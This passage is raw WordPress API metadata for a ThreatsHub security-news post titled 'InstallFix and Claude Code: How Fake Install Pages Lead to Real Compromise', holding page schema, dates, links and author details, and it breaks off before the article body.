News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80","datePublished":"2026-05-05T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/60590","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=60590"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/60590\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=60590"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=60590"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=60590"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

{"id":60590,"date":"2026-05-05T00:00:00","date_gmt":"2026-05-05T00:00:00","guid":{"rendered":"urn:uuid:a676d6e1-a56a-85e6-8e92-b869cdbf9118"},"modified":"2026-05-05T00:00:00","modified_gmt":"2026-05-05T00:00:00","slug":"installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/","title":{"rendered":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise"},"content":{"rendered":"